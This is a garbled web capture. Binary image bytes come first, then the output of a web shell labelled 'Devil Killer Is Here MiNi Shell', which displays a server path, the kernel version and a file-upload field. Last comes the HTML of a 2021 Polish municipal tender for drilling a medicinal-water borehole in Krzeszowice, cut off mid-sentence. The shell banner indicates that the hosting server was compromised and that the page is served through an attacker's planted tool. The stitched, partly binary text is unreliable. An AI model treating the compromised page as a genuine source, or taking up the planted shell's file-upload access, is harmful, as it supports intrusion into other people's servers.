JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210531/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210531/0006974101-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00069741 z dnia 2021-05-31</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Wykonanie otworu poszukiwawczo-rozpoznawczego Krzeszowice Zdrój I za wodą leczniczą w Krzeszowicach, powiat krakowski <br/>dla potrzeb projektowanego kompleksu basenowego </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Krzeszowice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 351555750</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grunwaldzka 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Krzeszowice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">32-065</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL214 - Krakowski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@um.krzeszowice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gminakrzeszowice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Wykonanie otworu poszukiwawczo-rozpoznawczego Krzeszowice Zdrój I za wodą leczniczą w Krzeszowicach, powiat krakowski <br/>dla potrzeb projektowanego kompleksu basenowego </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-11867578-c20d-11eb-911f-9ad5f74c2a25</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00069741</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-05-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001392/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.2 Wykonanie otworu poszukiwawczo-rozpoznawczego Krzeszowice Zdrój I za wodą leczniczą w Krzeszowicach</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym,a Wykonawcami odbywa się drogą elektroniczną przy<br/>użyciu miniPortalu https://miniportal.uzp.gov.pl/,ePUAPuhttps://epuap.gov.pl/wps/portal2.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do:  formularza<br/>złożenia, zmiany,wycofania oferty lub wniosku oraz do formularza do komunikacji. 3. Wymagania<br/>techniczne i organizacyjne wysyłania i odbierania korespondencji elektronicznej przekazywanej przy ich<br/>użyciu opisane zostały w Regulaminie korzystania z miniPortalu oraz Regulaminie ePUAP. 4.<br/>Wykonawca przystępując do niniejszego postępowania o udzielenie zamówienia publicznego, akceptuje<br/>warunki korzystania z miniPortalu,określone w Regulaminie miniPortalu oraz zobowiązuje się<br/>korzystając z miniPortalu przestrzegać tego regulaminu.5.Maksymalny rozmiar plików przesyłanych<br/>za pośrednictwem dedykowanych formularzy do: złożenia i wycofania oferty oraz do komunikacji<br/>wynosi150 MB.6. Do przygotowania oferty konieczne jest posiadanie przez osobę upoważnioną<br/>do reprezentowania Wykonawcy kwalifikowanego podpisu elektronicznego, lub podpisu osobistego<br/>lub podpisu zaufanego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:1) Administratorem Pani / Pana danych<br/>osobowych jest Gmina Krzeszowice reprezentowana przez Burmistrza gminy Krzeszowice Wacława<br/>Gregorczyka, 32-065 Krzeszowice, ul. Grunwaldzka 4,sekretariat@um.krzeszowice.pl, tel. (12) 252 08<br/>00;2) W sprawach związanych z danymi osobowymi można skontaktować się z wyznaczonym<br/>Inspektorem Ochrony Danych poprzez e-mail: iod@um.krzeszowice.pl.3) Pani/Pana dane osobowe<br/>przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego nr WGP.271.4.2021. na „Wykonanie otworu poszukiwawczo rozpoznawczego<br/>Krzeszowice Zdrój I za wodą leczniczą w Krzeszowicach, Powiat Krakowski dla<br/>potrzeb projektowanego kompleksu basenowego”;4) Odbiorcami Pani/Pana danych osobowych będą<br/>osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 18<br/>oraz art. 74 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (Dz. U. z 2019 r. poz.<br/>2019 z późn. zm.), dalej „ustawa Pzp”;5) Pani/Pana dane osobowe będą przechowywane, zgodnie z<br/>art. 78 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o udzielenie<br/>zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas<br/>trwania umowy;6) Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana<br/>dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych<br/>wynikają z ustawy Pzp;7) W odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;8) Posiada Pani/Pan:− na<br/>podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;− na podstawie<br/>art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych [Wyjaśnienie: skorzystanie z<br/>prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia<br/>publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może<br/>naruszać integralności protokołu oraz jego załączników];− na podstawie art. 18 RODO prawo żądania<br/>od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o<br/>których mowa w art. 18 ust. 2 RODO [Wyjaśnienie: prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesu publicznego Unii Europejskiej lub państwa członkowskiego];− prawo do wniesienia skargi do<br/>Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,że przetwarzanie danych<br/>osobowych Pani/Pana dotyczących narusza przepisy RODO;1. Nie przysługuje Pani/Panu:− w związku<br/>z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;− prawo do przenoszenia<br/>danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WGP.271.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia są roboty geologiczne polegające na wykonaniu otworu<br/>poszukiwawczo – rozpoznawczego Krzeszowice Zdrój I za wodą leczniczą w Krzeszowicach, dla<br/>potrzeb projektowanego kompleksu basenowego, z utworów jurajskich (gmina Krzeszowice,<br/>powiat krakowski, woj. małopolskie) w południowo-zachodniej części działki oznaczonej nr<br/>959/2. 2. Działka nr 959/2 zlokalizowana w m. Krzeszowice – miasto stanowi współwłasność<br/>gminy Krzeszowice 95/100 oraz Skarbu Państwa 5/100. Inwestor uzyskał zgodę<br/>współwłaściciela działki 959/2 tj. Starostwa Powiatowego w Krakowie na wejście w teren i<br/>wykonanie zaplanowanych robót geologicznych. 3. W ramach zamówienia zrealizowane<br/>zostaną następujące roboty: wykonanie otworu wiertniczego poszukiwawczo – rozpoznawczego<br/>Krzeszowice Zdrój I do głębokości 200,0 m systemem mechaniczno-obrotowym na płuczkę<br/>wodną oraz systemem młotków wgłębnych. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45255500-4 - Roboty wiertnicze i górnicze</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45255110-3 - Roboty budowlane w zakresie studni</p> <p class="mb-0">45262220-9 - Wiercenie studni wodnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">5 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie w wykonywaniu robót geologicznych</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. Warunki udziału w postępowaniu, określone przez Zamawiającego zgodnie z art. 112 ust. 1<br/>ustawy Pzp:1.1. Zdolności do występowania w obrocie gospodarczym.Zamawiający nie<br/>wyznacza szczegółowego warunku w tym zakresie.1.2. Uprawnień do prowadzenia określonej<br/>działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów.Zamawiający<br/>nie wyznacza szczegółowego warunku w tym zakresie.1.3. Sytuacji ekonomicznej lub<br/>finansowejZamawiający nie wyznacza szczegółowego warunku w tym zakresie.1.4. Zdolności<br/>technicznej lub zawodowej - o udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy<br/>wykażą, że:1.4.1. posiadają wiedzę i doświadczenie niezbędne do wykonania przedmiotu<br/>zamówienia, tj.w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli<br/>okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej dwa otwory<br/>wiertnicze za wodą leczniczą o głębokości co najmniej 200 m każdy.Uwagi:1) Zamawiający nie<br/>dopuszcza sumowania robót wykonanych w ramach odrębnych kontraktów (umów/ zamówień)<br/>celem uzyskania wymaganego warunku tj. głębokość 200 m.2) Zamawiający zastrzega, że przy<br/>ocenie warunku jw. nie będą brane pod uwagę roboty geologiczne mające na celu pogłębianie<br/>istniejących otworów lub ich rekonstrukcję. 3) Jeżeli Wykonawca wykazuje doświadczenie<br/>nabyte w ramach kontraktu (zamówienia/umowy) realizowanego przez wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia (konsorcjum), Zamawiający nie dopuszcza by<br/>Wykonawca polegał na doświadczeniu grupy wykonawców, której był członkiem, jeżeli<br/>faktycznie i konkretnie nie wykonywał wykazywanego zakresu prac. Zamawiający zastrzega<br/>możliwość zwrócenia się do wykonawcy o wyjaśnienia w zakresie faktycznie konkretnie<br/>wykonywanego zakresu prac oraz przedstawienia stosownych dowodów np. umowy<br/>konsorcjum, z której wynika zakres obowiązków czy wystawionych przez wykonawcę faktur.4)<br/>Zamawiający uzna za spełniony warunek SWZ również w przypadku, gdy doświadczenie<br/>wykazane przez Wykonawcę obejmuje szerszy zakres robót od wymaganych przez<br/>Zamawiającego.5) W przypadku złożenia przez Wykonawców dokumentów zawierających kwoty<br/>wyrażone w innych walutach niż PLN, dla potrzeb oceny spełniania warunku określonego<br/>powyżej, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs danej waluty<br/>publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w<br/>Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie<br/>Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za<br/>podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu<br/>publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on<br/>opublikowany.6) Zamawiający wymaga, aby Wykonawca podał wartości robót, przedmiot<br/>(zakres prac zgodnie z warunkiem jw. w szczególności głębokość odwiertu), daty wykonania i<br/>odbiorców wymienionych robót oraz załączył dokumenty potwierdzające, że ww. roboty<br/>budowlane zostały wykonane należycie. Wykaz należy przygotować według wzoru stanowiącego<br/>załącznik nr 4 „Wykaz robot”.7) W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia: - warunek określony w pkt. 1.4.1 powyżej musi być spełniony w całości<br/>przez co najmniej jednego z Wykonawców wspólnie ubiegających się o zamówienie (jeden lub<br/>każdy z podmiotów musi posiadać samodzielnie wymagane doświadczenie). W przypadku<br/>złożenia oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia wymaga<br/>się złożenia oświadczenia zgodnie z art. 117 ust. 4 ustawy Pzp.1.4.2. Dysponują lub będą<br/>dysponować osobami zdolnymi do wykonania zamówienia, które będą uczestniczyć w<br/>wykonywaniu zamówienia tj. a) Kierownikiem ruchu zakładu górniczego, posiadającym<br/>stosowne uprawnienia, legitymującym się co najmniej 5 - letnim doświadczeniem zawodowym<br/>(licząc od czasu uzyskania uprawnień). Osoba ta dodatkowo musi posiadać doświadczenie w<br/>zakresie kierowania pracami wiertniczymi przy wykonaniu co najmniej 2 otworów wiertniczych o<br/>głębokości co najmniej 200 m.b) Osobą posiadającą kwalifikacje do pełnienia wyższego dozoru<br/>ruchu, specjalności wiertniczej w zakładach wykonujących roboty geologiczne techniką<br/>wiertniczą w ramach poszukiwania i rozpoznawania wód podziemnych. Osoba ta dodatkowo<br/>musi posiadać doświadczenie w zakresie wykonania co najmniej 2 otworów wiertniczych o głębokości co najmniej 200 m w okresie ostatnich 5 lat (wymaganie minimalne). Zamawiający<br/>wskazuje, że w Dziale 20 SWZ wyznaczono pozacenowe kryteria oceny ofert, odnoszące się do „Doświadczenia w wykonywaniu robót geologicznych” osoby posiadającej kwalifikacje do pełnienia wyższego dozoru ruchu specjalności wiertniczej w zakładach wykonujących roboty geologiczne techniką wiertniczą w ramach poszukiwania i rozpoznawania wód podziemnych.<br/>Uwagi:1) Ilekroć w opisie warunków udziału w postępowaniu jest mowa o uprawnieniach, to w przypadku osób będących obywatelami krajów członkowskich Unii Europejskiej oznacza to decyzję w sprawie uznania wymaganych kwalifikacji do wykonywania w Rzeczypospolitej Polskiej samodzielnych funkcji technicznych w budownictwie w zakresie przedmiotu niniejszego<br/>zamówienia – zgodnie z właściwymi przepisami, w szczególności z ustawą z dnia 22 grudnia<br/>2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich<br/>Unii Europejskiej (Dz.U.2016.65).2) W przypadku Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia, warunek jw. może być spełniony przez Wykonawców wspólnie.3) Wykaz<br/>należy przygotować według wzoru stanowiącego załącznik nr 5 „Wykaz osób”. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">a) Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie<br/>ostatnich 5 lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w<br/>postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem<br/>ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały<br/>wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane<br/>należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa<br/>budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są referencje bądź inne<br/>dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z<br/>uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych<br/>dokumentów - inne dokumenty– według załącznika nr 4 do SWZ;b) Wykaz osób, skierowanych przez<br/>wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie<br/>robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień,<br/>doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia publicznego, a także zakresu<br/>wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami -<br/>według załącznika nr 5 do SWZ;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów, z innym wykonawcą, który złożył odrębna ofertę, albo oświadczenie o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającym przygotowanie<br/>oferty niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej, sporządzone zgodnie z Załącznikiem nr 6 do SWZ.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> W terminie wyznaczonym do składania ofert Wykonawca składa:1) Ofertę - wypełniony<br/>formularz ofertowy - załącznik nr 1 do SWZ2) Kosztorys ofertowy, stanowiący załącznik do oferty<br/>– według wzoru Załącznika 1A do SWZ3) aktualne na dzień składania ofert oświadczenie o<br/>niepodleganiu wykluczeniu z postępowania i spełnianiu warunków udziału w postępowaniu -<br/>załącznik nr 2 do SWZ4) zobowiązanie podmiotu udostępniającego zasoby, zgodnie z<br/>wytycznymi Działu 10A SWZ - jeżeli dotyczy5) oświadczenie o niepodleganiu 